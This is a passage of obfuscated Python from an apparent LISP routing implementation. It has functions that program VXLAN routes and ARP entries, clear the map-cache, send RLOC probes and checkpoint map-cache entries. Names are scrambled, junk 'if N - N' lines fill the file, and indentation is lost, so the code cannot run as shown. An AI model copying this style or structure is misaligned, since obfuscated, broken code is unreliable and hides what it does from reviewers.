if 50 - 50: iIii1I11I1II1 + iIii1I11I1II1
if 46 - 46: II111iiii
if 24 - 24: OOooOOo % OOooOOo * iII111i . Oo0Ooo * OOooOOo
if 52 - 52: I11i
return ( oOoO00ooo0 == "Y" )
if 46 - 46: Oo0Ooo % oO0o - I1IiiI + Ii1I
if 54 - 54: OoOoOO00 / ooOoO0o - I1IiiI
if 37 - 37: o0oOOo0O0Ooo
if 57 - 57: iII111i / i1IIi / i1IIi + IiII
if 75 - 75: IiII / O0
if 72 - 72: I11i
if 35 - 35: I11i % OoooooooOO / i1IIi * i1IIi / I1IiiI
if 42 - 42: I11i - i1IIi - oO0o / I11i + Ii1I + ooOoO0o
if 23 - 23: OoOoOO00 . oO0o - iII111i
if 27 - 27: Oo0Ooo * OOooOOo - OoOoOO00
if 1 - 1: II111iiii * i11iIiiIii . OoooooooOO
if 37 - 37: OoooooooOO + O0 . I11i % OoOoOO00
if 57 - 57: I1Ii111 . OOooOOo + I1Ii111 . iIii1I11I1II1 / oO0o / O0
if 88 - 88: I1Ii111
if 16 - 16: Oo0Ooo . ooOoO0o / OoO0O00 / o0oOOo0O0Ooo . OoooooooOO * OoO0O00
if 50 - 50: II111iiii + I11i . OoooooooOO . I1Ii111 - OOooOOo
if 83 - 83: oO0o
if 100 - 100: I1Ii111 + o0oOOo0O0Ooo * oO0o / oO0o . oO0o + iII111i
if 71 - 71: II111iiii + iII111i + O0 % Oo0Ooo / I1IiiI
if 52 - 52: Oo0Ooo . I1Ii111 * i1IIi / Oo0Ooo / OoO0O00
if 29 - 29: iII111i
if 91 - 91: Oo0Ooo - IiII
if 47 - 47: iII111i / OOooOOo + iII111i
if 69 - 69: I1IiiI . I1ii11iIi11i
if 18 - 18: I11i * I1IiiI
if 42 - 42: i1IIi . I1Ii111 - ooOoO0o + I11i / oO0o
if 60 - 60: i1IIi + OoooooooOO % i11iIiiIii / IiII % Oo0Ooo + I1IiiI
if 87 - 87: Ii1I % OoooooooOO % I1Ii111 * i11iIiiIii * OoOoOO00
if 78 - 78: I11i
if 62 - 62: iIii1I11I1II1 . o0oOOo0O0Ooo . ooOoO0o % oO0o % O0 % oO0o
if 51 - 51: Oo0Ooo / IiII - Oo0Ooo
if 71 - 71: I11i * I1ii11iIi11i * OOooOOo * o0oOOo0O0Ooo
if 53 - 53: I1IiiI % I1IiiI
if 80 - 80: OoO0O00 - i11iIiiIii / iII111i * I1ii11iIi11i / I1IiiI - I1Ii111
if 85 - 85: IiII
if 72 - 72: iII111i * OoOoOO00
if 65 - 65: iIii1I11I1II1 / iIii1I11I1II1 % O0 / II111iiii . OOooOOo . O0
if 65 - 65: I11i
if 35 - 35: o0oOOo0O0Ooo - i11iIiiIii
if 78 - 78: ooOoO0o - II111iiii - i1IIi
if 18 - 18: OoooooooOO % OoOoOO00 - IiII / oO0o . OOooOOo . I1IiiI
if 77 - 77: I1ii11iIi11i . OoO0O00 / OoOoOO00 / O0
if 67 - 67: ooOoO0o % I11i % oO0o
if 74 - 74: II111iiii
def lisp_program_vxlan_hardware ( mc ) :
if 44 - 44: Oo0Ooo + OoO0O00 + OoOoOO00 - I1IiiI
if 68 - 68: i11iIiiIii / OOooOOo . i1IIi . i11iIiiIii . I11i
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
if 18 - 18: I11i - I11i . OoOoOO00 . ooOoO0o
if ( os . path . exists ( "/persist/local/lispers.net" ) == False ) : return
if 31 - 31: ooOoO0o
if 87 - 87: OoooooooOO + OOooOOo - I1ii11iIi11i / I1IiiI + ooOoO0o - Oo0Ooo
if 19 - 19: ooOoO0o + I1ii11iIi11i - ooOoO0o
if 17 - 17: I11i * i1IIi + iIii1I11I1II1 % I1IiiI
if ( len ( mc . best_rloc_set ) == 0 ) : return
if 44 - 44: IiII + I1IiiI . Ii1I % Oo0Ooo
if 97 - 97: O0
if 95 - 95: OoO0O00 % iII111i / I1IiiI * OoooooooOO
if 31 - 31: iIii1I11I1II1
I11iI = mc . eid . print_prefix_no_iid ( )
OooOOoOO0OO = mc . best_rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 62 - 62: o0oOOo0O0Ooo - iII111i / II111iiii . o0oOOo0O0Ooo
if 20 - 20: iIii1I11I1II1 % OOooOOo
if 91 - 91: ooOoO0o
if 96 - 96: I1IiiI . OOooOOo
Oo0oO0o = getoutput ( "ip route get {} | egrep vlan4094" . format ( I11iI ) )
if 26 - 26: I1IiiI
if ( Oo0oO0o != "" ) :
lprint ( "Route {} already in hardware: '{}'" . format ( green ( I11iI , False ) , Oo0oO0o ) )
if 20 - 20: oO0o * O0 - Ii1I + i11iIiiIii - OoOoOO00
return
if 18 - 18: I1ii11iIi11i . iII111i
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
I1II11IIIiI11 = getoutput ( "ifconfig | egrep 'vxlan|vlan4094'" )
if ( I1II11IIIiI11 . find ( "vxlan" ) == - 1 ) :
lprint ( "No VXLAN interface found, cannot program hardware" )
return
if 65 - 65: I1Ii111 * I1ii11iIi11i
if ( I1II11IIIiI11 . find ( "vlan4094" ) == - 1 ) :
lprint ( "No vlan4094 interface found, cannot program hardware" )
return
if 54 - 54: ooOoO0o . i1IIi . OoooooooOO
IIIIiII = getoutput ( "ip addr | egrep vlan4094 | egrep inet" )
if ( IIIIiII == "" ) :
lprint ( "No IP address found on vlan4094, cannot program hardware" )
return
if 2 - 2: OoOoOO00 . I1IiiI
IIIIiII = IIIIiII . split ( "inet " ) [ 1 ]
IIIIiII = IIIIiII . split ( "/" ) [ 0 ]
if 88 - 88: I1IiiI
if 34 - 34: ooOoO0o + I1Ii111 / iIii1I11I1II1 + Ii1I . o0oOOo0O0Ooo * OoO0O00
if 74 - 74: i1IIi / iIii1I11I1II1 . I1ii11iIi11i
if 71 - 71: ooOoO0o % ooOoO0o * iII111i / Ii1I * O0
if 21 - 21: o0oOOo0O0Ooo * o0oOOo0O0Ooo - OoOoOO00 % OoOoOO00
if 8 - 8: I1ii11iIi11i
if 5 - 5: OOooOOo * i11iIiiIii % oO0o * ooOoO0o
iIIO000oOoo = [ ]
I1I1o0oOO0O0 = getoutput ( "arp -i vlan4094" ) . split ( "\n" )
for i11 in I1I1o0oOO0O0 :
if ( i11 . find ( "vlan4094" ) == - 1 ) : continue
if ( i11 . find ( "(incomplete)" ) == - 1 ) : continue
ooOoOoO00OO0oooo = i11 . split ( " " ) [ 0 ]
iIIO000oOoo . append ( ooOoOoO00OO0oooo )
if 64 - 64: O0 % o0oOOo0O0Ooo + OoooooooOO - I1IiiI
if 29 - 29: o0oOOo0O0Ooo - OoOoOO00 - OoooooooOO / OoOoOO00
ooOoOoO00OO0oooo = None
Oo0OO0oO = IIIIiII
IIIIiII = IIIIiII . split ( "." )
for OoOOoO0oOo in range ( 1 , 255 ) :
IIIIiII [ 3 ] = str ( OoOOoO0oOo )
oOOOo0o = "." . join ( IIIIiII )
if ( oOOOo0o in iIIO000oOoo ) : continue
if ( oOOOo0o == Oo0OO0oO ) : continue
ooOoOoO00OO0oooo = oOOOo0o
break
if 88 - 88: OoOoOO00 - IiII
if ( ooOoOoO00OO0oooo == None ) :
lprint ( "Address allocation failed for vlan4094, cannot program " + "hardware" )
if 96 - 96: Ii1I % iIii1I11I1II1
return
if 22 - 22: I1Ii111 - I1ii11iIi11i . Ii1I + o0oOOo0O0Ooo * OoooooooOO % iIii1I11I1II1
if 87 - 87: OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: oO0o + OoOoOO00
if 17 - 17: Ii1I . Oo0Ooo - oO0o % OOooOOo
if 59 - 59: O0
if 75 - 75: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i * oO0o * I11i / OoooooooOO
if 17 - 17: Ii1I % I1ii11iIi11i + I11i
Oooo = OooOOoOO0OO . split ( "." )
I1i11I111i = lisp_hex_string ( Oooo [ 1 ] ) . zfill ( 2 )
I11iI1 = lisp_hex_string ( Oooo [ 2 ] ) . zfill ( 2 )
ii1Ii1iII1iIi = lisp_hex_string ( Oooo [ 3 ] ) . zfill ( 2 )
O0o0oo0oOO0oO = "00:00:00:{}:{}:{}" . format ( I1i11I111i , I11iI1 , ii1Ii1iII1iIi )
i1I1iII1111II = "0000.00{}.{}{}" . format ( I1i11I111i , I11iI1 , ii1Ii1iII1iIi )
o0oo = "arp -i vlan4094 -s {} {}" . format ( ooOoOoO00OO0oooo , O0o0oo0oOO0oO )
os . system ( o0oo )
if 64 - 64: OoOoOO00 / OoO0O00 + oO0o
if 16 - 16: I1ii11iIi11i . I1ii11iIi11i
if 38 - 38: O0 / OoO0O00
if 80 - 80: ooOoO0o
iIII1Ii11ii = ( "mac address-table static {} vlan 4094 " + "interface vxlan 1 vtep {}" ) . format ( i1I1iII1111II , OooOOoOO0OO )
if 81 - 81: iII111i . OoO0O00
lisp_send_to_arista ( iIII1Ii11ii , None )
if 17 - 17: I1Ii111 - iIii1I11I1II1 % OoO0O00
if 15 - 15: OoOoOO00 % ooOoO0o * O0 / OoOoOO00
if 82 - 82: I1Ii111 * iIii1I11I1II1 . OOooOOo
if 9 - 9: OoOoOO00 - O0 + Oo0Ooo
if 89 - 89: IiII - iII111i + IiII
IIi11I1IIii = "ip route add {} via {}" . format ( I11iI , ooOoOoO00OO0oooo )
os . system ( IIi11I1IIii )
if 93 - 93: OoO0O00 . I1IiiI / I1Ii111 % iII111i
lprint ( "Hardware programmed with commands:" )
IIi11I1IIii = IIi11I1IIii . replace ( I11iI , green ( I11iI , False ) )
lprint ( " " + IIi11I1IIii )
lprint ( " " + o0oo )
iIII1Ii11ii = iIII1Ii11ii . replace ( OooOOoOO0OO , red ( OooOOoOO0OO , False ) )
lprint ( " " + iIII1Ii11ii )
return
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
if 75 - 75: I11i * IiII * ooOoO0o
def lisp_clear_hardware_walk ( mc , parms ) :
oO00Ooo0O0 = mc . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( oO00Ooo0O0 ) )
return ( [ True , None ] )
if 31 - 31: Ii1I
if 72 - 72: OOooOOo * Ii1I % OoO0O00
if 72 - 72: OoOoOO00 + o0oOOo0O0Ooo - i1IIi - OoO0O00 % OoOoOO00
if 42 - 42: oO0o / i1IIi . IiII
if 12 - 12: i11iIiiIii . ooOoO0o
if 80 - 80: O0 / iIii1I11I1II1 % iII111i * ooOoO0o / i11iIiiIii . OoOoOO00
if 88 - 88: OoooooooOO . I1IiiI
if 6 - 6: I1Ii111 - i11iIiiIii - oO0o
def lisp_clear_map_cache ( ) :
global lisp_map_cache , lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap , lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list , lisp_gleaned_groups
global lisp_no_map_request_rate_limit
if 7 - 7: i1IIi
iiIIIiII = bold ( "User cleared" , False )
IiI = lisp_map_cache . cache_count
lprint ( "{} map-cache with {} entries" . format ( iiIIIiII , IiI ) )
if 83 - 83: i11iIiiIii
if ( lisp_program_hardware ) :
lisp_map_cache . walk_cache ( lisp_clear_hardware_walk , None )
if 86 - 86: OoO0O00 * oO0o + ooOoO0o % iII111i
lisp_map_cache = lisp_cache ( )
if 81 - 81: i11iIiiIii . II111iiii * I11i + Ii1I / O0 . Oo0Ooo
if 29 - 29: IiII - IiII - OoooooooOO . Ii1I % OoooooooOO - OoOoOO00
if 33 - 33: oO0o * OoO0O00 / i11iIiiIii - I1IiiI * OoO0O00
if 19 - 19: OoooooooOO
lisp_no_map_request_rate_limit = lisp_get_timestamp ( )
if 34 - 34: OoOoOO00 . oO0o
if 53 - 53: oO0o + OoooooooOO * ooOoO0o
if 85 - 85: I1ii11iIi11i - o0oOOo0O0Ooo % o0oOOo0O0Ooo % iII111i * OoOoOO00
if 50 - 50: I1Ii111 + I1Ii111 + I11i - OoOoOO00
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
lisp_rloc_probe_list = { }
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 52 - 52: iIii1I11I1II1 + O0
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
if 95 - 95: OOooOOo - ooOoO0o % i1IIi / O0 % I11i . IiII
if 63 - 63: ooOoO0o
lisp_rtr_list = { }
if 22 - 22: OOooOOo . i11iIiiIii + II111iiii - Oo0Ooo % i1IIi / o0oOOo0O0Ooo
if 90 - 90: IiII
if 38 - 38: i1IIi / ooOoO0o / I11i * I1ii11iIi11i / II111iiii . iIii1I11I1II1
if 52 - 52: I1ii11iIi11i % ooOoO0o * Ii1I * IiII + IiII / i11iIiiIii
lisp_gleaned_groups = { }
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo % o0oOOo0O0Ooo . Ii1I / OoooooooOO
if 23 - 23: oO0o * I1IiiI - oO0o - ooOoO0o . IiII / i11iIiiIii
if 53 - 53: Ii1I * Ii1I . OoOoOO00 . OOooOOo / I1ii11iIi11i % O0
if 98 - 98: OOooOOo
lisp_process_data_plane_restart ( True )
return
if 11 - 11: OOooOOo * iIii1I11I1II1 % IiII - I1IiiI . I11i
if 29 - 29: OOooOOo % I11i - OOooOOo - OOooOOo * I11i . oO0o
if 75 - 75: II111iiii . O0 . I1Ii111 * O0 / OoooooooOO
if 60 - 60: OOooOOo - Oo0Ooo * OOooOOo / OoO0O00
if 55 - 55: I1ii11iIi11i * II111iiii * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1 % I1ii11iIi11i . Ii1I + I1IiiI % i11iIiiIii - i11iIiiIii
if 62 - 62: I1Ii111 + I1IiiI
if 9 - 9: iIii1I11I1II1 / iIii1I11I1II1
if 24 - 24: OOooOOo . I1IiiI % i11iIiiIii
if 43 - 43: OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i + OoO0O00 . I1Ii111 . iII111i
if 1 - 1: iII111i / OoO0O00 / OoOoOO00 * Oo0Ooo * OoooooooOO
def lisp_encapsulate_rloc_probe ( lisp_sockets , rloc , nat_info , packet ) :
if ( len ( lisp_sockets ) != 4 ) : return
if 59 - 59: iII111i
IIIiiI11ii = lisp_myrlocs [ 0 ]
if 30 - 30: iII111i . OoO0O00 . i11iIiiIii / I1ii11iIi11i * Oo0Ooo
if 38 - 38: IiII + II111iiii
if 20 - 20: iII111i * I1IiiI * iII111i - o0oOOo0O0Ooo + i1IIi + ooOoO0o
if 49 - 49: II111iiii * I1IiiI / oO0o
if 50 - 50: Ii1I + O0 . I1IiiI * Oo0Ooo
iI = len ( packet ) + 28
o0OO00oo0O = struct . pack ( "BBHIBBHII" , 0x45 , 0 , socket . htons ( iI ) , 0 , 64 ,
17 , 0 , socket . htonl ( IIIiiI11ii . address ) , socket . htonl ( rloc . address ) )
o0OO00oo0O = lisp_ip_checksum ( o0OO00oo0O )
if 15 - 15: Oo0Ooo
Ii1iiI1 = struct . pack ( "HHHH" , 0 , socket . htons ( LISP_CTRL_PORT ) ,
socket . htons ( iI - 20 ) , 0 )
if 53 - 53: OoooooooOO * O0 / iII111i * ooOoO0o % I1Ii111 + OOooOOo
if 95 - 95: I1Ii111 % OoOoOO00 . IiII * iII111i % Ii1I
if 18 - 18: iIii1I11I1II1 / ooOoO0o / I1Ii111 % oO0o * Ii1I
if 14 - 14: oO0o
packet = lisp_packet ( o0OO00oo0O + Ii1iiI1 + packet )
if 72 - 72: iIii1I11I1II1 / II111iiii * II111iiii + I1IiiI + iIii1I11I1II1 + oO0o
if 46 - 46: I1Ii111
if 23 - 23: Oo0Ooo * IiII - I1Ii111 . OoooooooOO
if 78 - 78: OoOoOO00 - iIii1I11I1II1
packet . inner_dest . copy_address ( rloc )
packet . inner_dest . instance_id = 0xffffff
packet . inner_source . copy_address ( IIIiiI11ii )
packet . inner_ttl = 64
packet . outer_dest . copy_address ( rloc )
packet . outer_source . copy_address ( IIIiiI11ii )
packet . outer_version = packet . outer_dest . afi_to_version ( )
packet . outer_ttl = 64
packet . encap_port = nat_info . port if nat_info else LISP_DATA_PORT
if 20 - 20: i1IIi
o00oO = red ( rloc . print_address_no_iid ( ) , False )
if ( nat_info ) :
Ooo0OOo = " {}" . format ( blue ( nat_info . hostname , False ) )
I1IO0O00o0oo0oO = bold ( "RLOC-probe request" , False )
else :
Ooo0OOo = ""
I1IO0O00o0oo0oO = bold ( "RLOC-probe reply" , False )
if 72 - 72: ooOoO0o . II111iiii
if 32 - 32: I1Ii111 - oO0o + OoooooooOO . OoOoOO00 + i11iIiiIii / i1IIi
lprint ( ( "Data encapsulate {} to {}{} port {} for " + "NAT-traversal" ) . format ( I1IO0O00o0oo0oO , o00oO , Ooo0OOo , packet . encap_port ) )
if 26 - 26: I1IiiI + OoooooooOO % OoOoOO00 . IiII - II111iiii . OoOoOO00
if 37 - 37: OoO0O00 % O0 + OoOoOO00 * I11i . Ii1I * OoO0O00
if 18 - 18: o0oOOo0O0Ooo / OOooOOo
if 28 - 28: O0 / Ii1I - oO0o % I1ii11iIi11i % O0 . OoO0O00
if 100 - 100: O0
if ( packet . encode ( None ) == None ) : return
packet . print_packet ( "Send" , True )
if 19 - 19: Ii1I * iIii1I11I1II1 * Oo0Ooo - i11iIiiIii * i11iIiiIii - OOooOOo
ooo = lisp_sockets [ 3 ]
packet . send_packet ( ooo , packet . outer_dest )
del ( packet )
return
if 13 - 13: OoOoOO00 % oO0o / i1IIi * iIii1I11I1II1
if 38 - 38: Ii1I
if 20 - 20: iIii1I11I1II1 + Oo0Ooo - Ii1I / i11iIiiIii . OoO0O00
if 66 - 66: OoooooooOO - Ii1I / iII111i . I1IiiI + I1ii11iIi11i - I1Ii111
if 36 - 36: I1Ii111 - OoO0O00 . I1ii11iIi11i * I1ii11iIi11i
if 9 - 9: OOooOOo - oO0o - iIii1I11I1II1 * i11iIiiIii / I11i
if 2 - 2: i1IIi % iII111i * ooOoO0o / OoOoOO00 + Oo0Ooo
if 59 - 59: i11iIiiIii / I1IiiI * iII111i
def lisp_get_default_route_next_hops ( ) :
if 16 - 16: i11iIiiIii * II111iiii - ooOoO0o
if 80 - 80: iIii1I11I1II1 + iIii1I11I1II1 + I1Ii111 - IiII * iII111i - Ii1I
if 89 - 89: O0 * ooOoO0o
if 36 - 36: I1ii11iIi11i * II111iiii * iII111i + I1IiiI + OoO0O00 + oO0o
if ( lisp_is_macos ( ) ) :
i1iii1IiiiI1i1 = "route -n get default"
I1iiiIi1 = getoutput ( i1iii1IiiiI1i1 ) . split ( "\n" )
Oo000oo00o0 = i1i1111I = None
for iiI1i1I in I1iiiIi1 :
if ( iiI1i1I . find ( "gateway: " ) != - 1 ) : Oo000oo00o0 = iiI1i1I . split ( ": " ) [ 1 ]
if ( iiI1i1I . find ( "interface: " ) != - 1 ) : i1i1111I = iiI1i1I . split ( ": " ) [ 1 ]
if 93 - 93: i11iIiiIii * II111iiii
return ( [ [ i1i1111I , Oo000oo00o0 ] ] )
if 98 - 98: Ii1I * Ii1I / IiII
if 1 - 1: OOooOOo
if 47 - 47: i11iIiiIii - I11i
if 38 - 38: Oo0Ooo % OoooooooOO + iII111i
if 31 - 31: OoO0O00 + I1Ii111 / iIii1I11I1II1
i1iii1IiiiI1i1 = "ip route | egrep 'default via'"
o0O00Oo = getoutput ( i1iii1IiiiI1i1 ) . split ( "\n" )
if 11 - 11: ooOoO0o - OoOoOO00
oOOooo = [ ]
for Oo0oO0o in o0O00Oo :
if ( Oo0oO0o . find ( " metric " ) != - 1 ) : continue
I1I1iIiiiiII11 = Oo0oO0o . split ( " " )
try :
IiooO = I1I1iIiiiiII11 . index ( "via" ) + 1
if ( IiooO >= len ( I1I1iIiiiiII11 ) ) : continue
OOOO0OOoO0 = I1I1iIiiiiII11 . index ( "dev" ) + 1
if ( OOOO0OOoO0 >= len ( I1I1iIiiiiII11 ) ) : continue
except :
continue
if 98 - 98: II111iiii
if 56 - 56: i1IIi % IiII / I1Ii111
oOOooo . append ( [ I1I1iIiiiiII11 [ OOOO0OOoO0 ] , I1I1iIiiiiII11 [ IiooO ] ] )
if 1 - 1: I1IiiI / OoOoOO00 - oO0o + OoooooooOO
return ( oOOooo )
if 51 - 51: ooOoO0o + Ii1I * o0oOOo0O0Ooo * I1IiiI / oO0o + OoO0O00
if 92 - 92: oO0o * o0oOOo0O0Ooo % ooOoO0o + OoOoOO00 * OoooooooOO * Oo0Ooo
if 86 - 86: iII111i / OoooooooOO * I1Ii111 % I1IiiI + Ii1I
if 16 - 16: OoO0O00
if 41 - 41: i1IIi
if 72 - 72: OoooooooOO / i11iIiiIii - O0 . OoOoOO00
if 41 - 41: IiII + oO0o * iIii1I11I1II1 % oO0o + IiII
def lisp_get_host_route_next_hop ( rloc ) :
i1iii1IiiiI1i1 = "ip route | egrep '{} via'" . format ( rloc )
Oo0oO0o = getoutput ( i1iii1IiiiI1i1 ) . split ( " " )
if 64 - 64: I1ii11iIi11i % OoO0O00 + oO0o
try : OOOooo0OooOoO = Oo0oO0o . index ( "via" ) + 1
except : return ( None )
if 47 - 47: I1ii11iIi11i + Ii1I % I1Ii111 % OoO0O00 . IiII % i1IIi
if ( OOOooo0OooOoO >= len ( Oo0oO0o ) ) : return ( None )
return ( Oo0oO0o [ OOOooo0OooOoO ] )
if 14 - 14: O0 / I1IiiI . I1ii11iIi11i
if 47 - 47: I1Ii111 * ooOoO0o / iII111i . O0
if 61 - 61: II111iiii . OoO0O00 * OoO0O00 % II111iiii % OOooOOo * OoOoOO00
if 82 - 82: Ii1I
if 83 - 83: I1IiiI
if 22 - 22: IiII / Ii1I + I1Ii111 % iIii1I11I1II1
if 75 - 75: OoOoOO00 % OoOoOO00 % o0oOOo0O0Ooo % I1ii11iIi11i + IiII
def lisp_install_host_route ( dest , nh , install ) :
install = "add" if install else "delete"
oOoo0000 = "none" if nh == None else nh
if 45 - 45: I11i - iIii1I11I1II1
lprint ( "{} host-route {}, nh {}" . format ( install . title ( ) , dest , oOoo0000 ) )
if 20 - 20: OoOoOO00
if ( nh == None ) :
IiI1III1ii = "ip route {} {}/32" . format ( install , dest )
else :
IiI1III1ii = "ip route {} {}/32 via {}" . format ( install , dest , nh )
if 84 - 84: OoOoOO00
os . system ( IiI1III1ii )
return
if 59 - 59: Ii1I / I1Ii111 + i11iIiiIii
if 20 - 20: O0 / I1Ii111 - OOooOOo % iIii1I11I1II1
if 89 - 89: O0 * OoOoOO00 . ooOoO0o
if 11 - 11: iIii1I11I1II1 * OoO0O00 . I1IiiI * OoOoOO00 / II111iiii
if 72 - 72: I11i
if 7 - 7: i1IIi - o0oOOo0O0Ooo - I1IiiI
if 62 - 62: OoOoOO00 * oO0o - I1IiiI / Ii1I
if 48 - 48: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoOoOO00
def lisp_checkpoint ( checkpoint_list ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 13 - 13: OoO0O00 - Ii1I . ooOoO0o / O0 * OoOoOO00
iiI1i1I = open ( lisp_checkpoint_filename , "w" )
for iIiiI11II11i in checkpoint_list :
iiI1i1I . write ( iIiiI11II11i + "\n" )
if 57 - 57: O0 + OoooooooOO % o0oOOo0O0Ooo / I1Ii111 / OOooOOo - OoOoOO00
iiI1i1I . close ( )
lprint ( "{} {} entries to file '{}'" . format ( bold ( "Checkpoint" , False ) ,
len ( checkpoint_list ) , lisp_checkpoint_filename ) )
return
if 48 - 48: o0oOOo0O0Ooo - II111iiii + OoOoOO00
if 54 - 54: II111iiii - OoO0O00 - o0oOOo0O0Ooo - O0 % I1Ii111
if 9 - 9: i1IIi % iII111i / Ii1I
if 83 - 83: oO0o
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
def lisp_load_checkpoint ( ) :
if ( lisp_checkpoint_map_cache == False ) : return
if ( os . path . exists ( lisp_checkpoint_filename ) == False ) : return
if 92 - 92: OoO0O00 - iII111i
iiI1i1I = open ( lisp_checkpoint_filename , "r" )
if 97 - 97: ooOoO0o / I11i . IiII + I1Ii111 . iIii1I11I1II1
IiI = 0
for iIiiI11II11i in iiI1i1I :
IiI += 1
I1i = iIiiI11II11i . split ( " rloc " )
o0O = [ ] if ( I1i [ 1 ] in [ "native-forward\n" , "\n" ] ) else I1i [ 1 ] . split ( ", " )
if 24 - 24: ooOoO0o - oO0o % OoOoOO00 * Oo0Ooo
if 54 - 54: Ii1I - OoooooooOO % I1IiiI + oO0o
IiIiIiiII1I = [ ]
for OooOOoOO0OO in o0O :
iII = lisp_rloc ( False )
I1I1iIiiiiII11 = OooOOoOO0OO . split ( " " )
iII . rloc . store_address ( I1I1iIiiiiII11 [ 0 ] )
iII . priority = int ( I1I1iIiiiiII11 [ 1 ] )
iII . weight = int ( I1I1iIiiiiII11 [ 2 ] )
IiIiIiiII1I . append ( iII )
if 70 - 70: I1Ii111 % iIii1I11I1II1
if 74 - 74: i1IIi % i11iIiiIii + oO0o
I11 = lisp_mapping ( "" , "" , IiIiIiiII1I )
if ( I11 != None ) :
I11 . eid . store_prefix ( I1i [ 0 ] )
I11 . checkpoint_entry = True
I11 . map_cache_ttl = LISP_NMR_TTL * 60
if ( IiIiIiiII1I == [ ] ) : I11 . action = LISP_NATIVE_FORWARD_ACTION
I11 . add_cache ( )
continue
if 94 - 94: OoO0O00 * I1IiiI / O0 + I1Ii111 / i11iIiiIii
if 34 - 34: Oo0Ooo . i1IIi
IiI -= 1
if 97 - 97: I11i
if 89 - 89: iII111i % OoOoOO00 . Oo0Ooo
iiI1i1I . close ( )
lprint ( "{} {} map-cache entries from file '{}'" . format (
bold ( "Loaded" , False ) , IiI , lisp_checkpoint_filename ) )
return
if 20 - 20: oO0o % OoOoOO00
if 93 - 93: I1ii11iIi11i - Ii1I % i1IIi / i1IIi
if 82 - 82: OOooOOo
if 27 - 27: I1Ii111 / IiII - i1IIi * Ii1I
if 90 - 90: ooOoO0o
if 100 - 100: iII111i * i1IIi . iII111i / O0 / OoO0O00 - oO0o
if 65 - 65: OoOoOO00 + ooOoO0o * OoO0O00 % OoooooooOO + OoooooooOO * OoooooooOO
if 49 - 49: o0oOOo0O0Ooo + i1IIi / iII111i
if 43 - 43: i1IIi . OoO0O00 + I1ii11iIi11i
if 88 - 88: OoooooooOO / I11i % II111iiii % OOooOOo - I11i
if 55 - 55: Oo0Ooo - OOooOOo - O0
if 40 - 40: OoOoOO00 - OOooOOo
if 3 - 3: IiII % I11i * I1Ii111 + iIii1I11I1II1 . oO0o
if 35 - 35: II111iiii
def lisp_write_checkpoint_entry ( checkpoint_list , mc ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 15 - 15: I11i * iIii1I11I1II1 + OOooOOo % IiII . o0oOOo0O0Ooo % Oo0Ooo
iIiiI11II11i = "{} rloc " . format ( mc . eid . print_prefix ( ) )
if 96 - 96: O0
for iII in mc . rloc_set :
if ( iII . rloc . is_null ( ) ) : continue
iIiiI11II11i += "{} {} {}, " . format ( iII . rloc . print_address_no_iid ( ) ,
iII . priority , iII . weight )
if 15 - 15: i1IIi . iIii1I11I1II1
if 3 - 3: II111iiii * i11iIiiIii * i1IIi - i1IIi
if ( mc . rloc_set != [ ] ) :
iIiiI11II11i = iIiiI11II11i [ 0 : - 2 ]
elif ( mc . action == LISP_NATIVE_FORWARD_ACTION ) :
iIiiI11II11i += "native-forward"
if 11 - 11: I1IiiI % Ii1I * i11iIiiIii % OOooOOo + II111iiii
if 61 - 61: I1Ii111 + I11i + I1IiiI
checkpoint_list . append ( iIiiI11II11i )
return
if 48 - 48: I11i
if 67 - 67: o0oOOo0O0Ooo
if 36 - 36: IiII - I11i - Ii1I / OoOoOO00 % OoO0O00 * iIii1I11I1II1
if 61 - 61: i11iIiiIii / Ii1I - OOooOOo . I1ii11iIi11i
if 89 - 89: ooOoO0o % i11iIiiIii
if 57 - 57: Oo0Ooo / ooOoO0o - O0 . ooOoO0o
if 61 - 61: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i + Oo0Ooo
def lisp_check_dp_socket ( ) :
o00oo0OoOo0 = lisp_ipc_dp_socket_name
if ( os . path . exists ( o00oo0OoOo0 ) == False ) :
I1III11ii1I11 = bold ( "does not exist" , False )
lprint ( "Socket '{}' {}" . format ( o00oo0OoOo0 , I1III11ii1I11 ) )
return ( False )
if 40 - 40: i11iIiiIii
return ( True )
